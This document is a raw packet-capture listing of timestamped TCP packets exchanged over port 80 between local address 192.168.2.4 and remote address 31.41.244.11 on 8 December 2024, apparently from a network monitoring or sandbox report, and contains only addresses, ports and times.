                                                                                                                                          Dec 8, 2024 18:06:12.882986069 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.883105040 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.883145094 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.883876085 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.884006977 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.884047031 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.884840012 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.884895086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.884942055 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.885710955 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.885759115 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.885775089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.886672974 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.886713982 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.886775017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.887630939 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.887675047 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.887691975 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.887729883 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.888448000 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.888575077 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.888617039 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.889364004 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.889448881 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.889487982 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.890238047 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.890346050 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.890389919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.891169071 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.891210079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.891212940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.891905069 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.892055988 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.892101049 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.892229080 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.892271042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.893001080 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.893044949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.893078089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.893116951 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.893887043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.893935919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.894006014 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.894064903 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.894834042 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.894877911 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.894895077 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.895683050 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.895728111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.895791054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.896629095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.896673918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.896718979 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.896761894 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.897522926 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.897617102 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.897663116 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.898526907 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.898641109 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.898684978 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.899353027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.899395943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.899434090 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.900242090 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.900289059 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.045126915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.045221090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.045329094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.045377016 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.045500994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.045546055 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.045656919 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.045700073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.045783997 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.045825958 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.046593904 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.046641111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.046694994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.046736956 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.047487020 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.047504902 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.047528982 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.047540903 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.048320055 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.048366070 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.048398018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.048439026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.049264908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.049307108 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.049328089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.049370050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.050123930 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.050167084 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.050228119 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.050271034 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.051070929 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.051116943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.051172972 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.051215887 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.051949024 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.051989079 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.052066088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.052108049 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.052850008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.052891970 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.052997112 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.053039074 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.053785086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.053828955 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.053864002 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.053905964 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.054730892 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.054763079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.054780960 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.054795980 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.055627108 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.055689096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.055725098 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.055768013 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.056555033 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.056598902 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.056632042 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.056674957 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.057404041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.057446003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.057521105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.057562113 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.058350086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.058392048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.058465958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.058507919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.059277058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.059330940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.059360027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.059401989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.060123920 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.060165882 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.060242891 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.060277939 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.061009884 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.061050892 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.061155081 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.061194897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.062011003 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.062055111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.062144995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.062186956 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.062922001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.062967062 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.063000917 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.063043118 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.063810110 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.063853025 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.063888073 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.063931942 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.064662933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.064706087 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.064768076 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.064806938 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.065577030 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.065622091 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.065711021 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.065754890 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.066509008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.066550970 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.066644907 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.066690922 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.067697048 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.067708969 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.067738056 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.067748070 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.068315029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.068357944 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.068422079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.068468094 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.069252968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.069293976 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.069386959 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.069430113 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.070192099 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.070233107 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.070233107 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.070270061 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.071063995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.071103096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.071219921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.071258068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.071940899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.071981907 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.072066069 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.072107077 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.072846889 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.072889090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.072943926 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.072987080 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.073785067 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.073826075 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.073858976 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.073899031 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.074712992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.074754000 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.074786901 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.074825048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.075576067 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.075617075 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.075681925 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.075742960 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.076574087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.076613903 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.076738119 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.076781988 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.077471018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.077510118 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.077652931 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.077693939 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.078401089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.078443050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.078540087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.078582048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.079219103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.079260111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.079329967 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.079369068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.080189943 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.080234051 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.080270052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.080310106 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.081111908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.081156015 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.081254005 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.081295967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.081952095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.081994057 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.082062006 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.082104921 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.082911968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.082956076 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.082974911 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.083065033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.083811045 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.083853006 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.083904982 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.083945990 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.084695101 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.084736109 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.084842920 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.084887028 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.085850954 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.085861921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.085889101 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.085900068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.086489916 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.086533070 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.086683989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.086721897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.087377071 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.087419033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.087501049 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.087539911 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.088396072 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.088438988 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.088443041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.088485003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.089332104 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.089375973 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.089467049 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.089509964 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.090126991 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.090169907 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.090238094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.090280056 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.091032982 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.091078043 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.091212988 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.091253996 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.091945887 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.091988087 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.092080116 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.092122078 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.237354994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.237462044 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.237518072 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.237765074 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.237876892 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.237919092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.238694906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.238738060 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.238776922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.239538908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.239581108 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.239639044 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.239903927 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.240458012 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.240628004 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.240664959 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.241355896 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.241471052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.241506100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.242253065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.242289066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.242366076 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.242911100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.243171930 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.243211985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.243302107 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.243333101 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.244138002 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.244244099 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.244282961 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.245089054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.245219946 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.245259047 CET4976580192.168.2.431.41.244.11
